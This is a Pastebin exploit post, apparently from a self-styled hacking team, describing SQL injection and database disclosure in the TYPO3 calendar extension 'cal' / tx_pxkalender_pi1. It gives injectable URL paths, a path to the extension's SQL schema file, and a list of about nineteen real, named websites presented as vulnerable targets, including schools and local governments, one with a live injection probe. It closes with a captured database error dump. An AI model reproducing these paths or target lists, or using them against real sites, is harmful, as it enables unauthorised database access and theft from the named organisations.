API tools faq
paste
KingSkrupellos

Typo3 Calendar Base tx_pxkalender_pi1 2.0.0 SQL Inj DB Disc

KingSkrupellos
Feb 18th, 2019
65
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 6.16 KB | None | 0 0
raw download clone embed print report
  1. ###################################################################################
  2.  
  3. # Exploit Title : Typo3 Calendar Base tx_pxkalender_pi1 2.0.0 SQL Injection / Database Disclosure
  4. # Author [ Discovered By ] : KingSkrupellos
  5. # Team : Cyberizm Digital Security Army
  6. # Date : 18/02/2019
  7. # Vendor Homepage : typo3.org
  8. # Software Download Link : extensions.typo3.org/extension/download/cal/2.0.0/zip/
  9. # Software Information Link : extensions.typo3.org/extension/cal/
  10. # Software Version : From 0.7.0 To 2.0.0 / All Versions
  11. Works with TYPO3 Free Stable Alpha Experimantal
  12. 3.8.0 - 4.3.99 - 8.7.99 - 9.5.99 - 6.1.0 - 8.9.99
  13. 6.2.0 - 6.2.99 - 6.1.0 - 6.2.99 - 4.5.5 - 6.0.99
  14. # Tested On : Windows and Linux
  15. # Category : WebApps
  16. # Exploit Risk : Medium
  17. # Vulnerability Type : CWE-89 [ Improper Neutralization of
  18. Special Elements used in an SQL Command ('SQL Injection') ]
  19. # PacketStormSecurity : packetstormsecurity.com/files/authors/13968
  20. # CXSecurity : cxsecurity.com/author/KingSkrupellos/1/
  21. # Exploit4Arab : exploit4arab.org/author/351/KingSkrupellos
  22.  
  23. ###################################################################################
  24.  
  25. # Description about Software :
  26. ***************************
  27. A calendar combining all the functions of the existing calendar
  28.  
  29. extensions plus adding some new features. It is based on the ical standard.
  30.  
  31. ###################################################################################
  32.  
  33. # Impact :
  34. ***********
  35. Typo3 Calendar Base tx_pxkalender_pi1 2.0.0 [ and other versions ]
  36.  
  37. extension for TYPO3 is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize
  38.  
  39. user-supplied data before using it in an SQL query.
  40.  
  41. Exploiting this issue could allow an attacker to compromise the application,
  42.  
  43. access or modify data, or exploit latent vulnerabilities in the underlying database.
  44.  
  45. A remote attacker can send a specially crafted request to the vulnerable application
  46.  
  47. and execute arbitrary SQL commands in application`s database.
  48.  
  49. Further exploitation of this vulnerability may result in unauthorized data manipulation.
  50.  
  51. An attacker can exploit this issue using a browser.
  52.  
  53. ###################################################################################
  54.  
  55. # SQL Injection Exploit :
  56. **********************
  57.  
  58. /index.php?L=[ID-NUMBER]&tx_pxkalender_pi1%5Btermin%5D=[ID-NUMBER]&id=[SQL Injection]
  59.  
  60. /typo3conf/ext/cal/res/PEAR/Date/TimeZone.php?id=[SQL Injection]
  61.  
  62. # Database Disclosure Exploit :
  63. **************************
  64.  
  65. /typo3conf/ext/cal/ext_tables.sql
  66.  
  67. ###################################################################################
  68.  
  69. # Example Vulnerable Sites :
  70. *************************
  71.  
  72. [+] klinikverbund-suedwest.de/index.php?L=0&tx_pxkalender_pi1%5Btermin%5D=2511&id=3084%27
  73.  
  74. [+] creation-willigeller.com/typo3conf/ext/cal/ext_tables.sql
  75.  
  76. [+] kupferdreh.com/typo3conf/ext/cal/ext_tables.sql
  77.  
  78. [+] cyfra7.com/typo3conf/ext/cal/ext_tables.sql
  79.  
  80. [+] maska.si/typo3conf/ext/cal/ext_tables.sql
  81.  
  82. [+] belasso.de/typo3conf/ext/cal/ext_tables.sql
  83.  
  84. [+] usk-anif.at/typo3conf/ext/cal/ext_tables.sql
  85.  
  86. [+] emergegroup.com/typo3conf/ext/cal/ext_tables.sql
  87.  
  88. [+] von-buelow-gymnasium.de/typo3conf/ext/cal/ext_tables.sql
  89.  
  90. [+] jammertrust.org/typo3conf/ext/cal/ext_tables.sql
  91.  
  92. [+] mittelhofschule-ellwangen.de/typo3conf/ext/cal/ext_tables.sql
  93.  
  94. [+] radinfo.at/typo3conf/ext/cal/ext_tables.sql
  95.  
  96. [+] betriebsratspraxis24.de/typo3conf/ext/cal/ext_tables.sql
  97.  
  98. [+] gemeinde-gaiberg.de/typo3conf/ext/cal/ext_tables.sql
  99.  
  100. [+] provincia.livorno.it/typo3conf/ext/cal/ext_tables.sql
  101.  
  102. [+] bnr.rw/typo3conf/ext/cal/ext_tables.sql
  103.  
  104. [+] sankt-josef.de/typo3conf/ext/cal/ext_tables.sql
  105.  
  106. [+] foto-on-line.pl/typo3conf/ext/cal/ext_tables.sql
  107.  
  108. [+] versicherungspraxis24.de/typo3conf/ext/cal/ext_tables.sql
  109.  
  110. ###################################################################################
  111.  
  112. # Example SQL Database Error :
  113. ****************************
  114.  
  115. array(4 items)
  116. caller =>
  117.  
  118. 'TYPO3\CMS\Core\Database\DatabaseConnection::exec_SELECTquery' (60 chars)
  119.  
  120. ERROR =>
  121. ***********
  122.  
  123. 'You have an error in your SQL syntax; check the manual that corresponds to y
  124. our MariaDB server version for the right syntax to use near ') AND pages.del
  125. eted=0 AND pages.t3ver_state<=0 AND pages.pid<>-1 AND pages.hidde' at line 1' (228 chars)
  126.  
  127. lastBuiltQuery =>
  128. ****************
  129.  
  130. 'SELECT * FROM pages WHERE 1 AND uid IN () AND pages.deleted=0 AND pages.t3ve
  131. r_state<=0 AND pages.pid<>-1 AND pages.hidden=0 AND pages.starttime<=1550510
  132. 640 AND (pages.endtime=0 OR pages.endtime>1550510640) AND (pages.fe_group=''
  133. OR pages.fe_group IS NULL OR pages.fe_group='0' OR FIND_IN_SET('0',pages.fe
  134. _group) OR FIND_IN_SET('-1',pages.fe_group))' (348 chars)
  135.  
  136. debug_backtrace =>
  137. ******************
  138.  
  139. 'call_user_func#34 // {closure}# // TYPO3\CMS\Frontend\Http\Application->run#
  140. 33 // TYPO3\CMS\Core\Core\Bootstrap->handleRequest#78 // TYPO3\CMS\Frontend\
  141. Http\RequestHandler->handleRequest#307 // TYPO3\CMS\Frontend\Controller\Typo
  142. ScriptFrontendController->INTincScript#232 // TYPO3\CMS\Frontend\Controller\
  143. TypoScriptFrontendController->recursivelyReplaceIntPlaceholdersInContent#348
  144. 8 // TYPO3\CMS\Frontend\Controller\TypoScriptFrontendController->INTincScrip
  145. t_process#3522 // TYPO3\CMS\Frontend\ContentObject\ContentObjectRenderer->cO
  146. bjGetSingle#3577 // TYPO3\CMS\Frontend\ContentObject\ContentObjectRenderer->
  147. render#859 // TYPO3\CMS\Frontend\ContentObject\UserContentObject->render#943
  148. // TYPO3\CMS\Frontend\ContentObject\ContentObjectRenderer->callUserFunction
  149. #40 // call_user_func_array#7316 // tx_pxkalender_pi1->main# // tx_pxkalende
  150. r_pi1->getSingleTermin#263 // tx_pxkalender_pi1->model_getAbteilungenByUidLi
  151. st#335 // TYPO3\CMS\Core\Database\DatabaseConnection->exec_SELECTquery#300 /
  152. / TYPO3\CMS\Core\Database\DatabaseConnection->debug#314' (1043 chars)
  153.  
  154. ###################################################################################
  155.  
  156. # Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team
  157.  
  158. ###################################################################################
Add Comment
Please, Sign In to add comment
Public Pastes
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!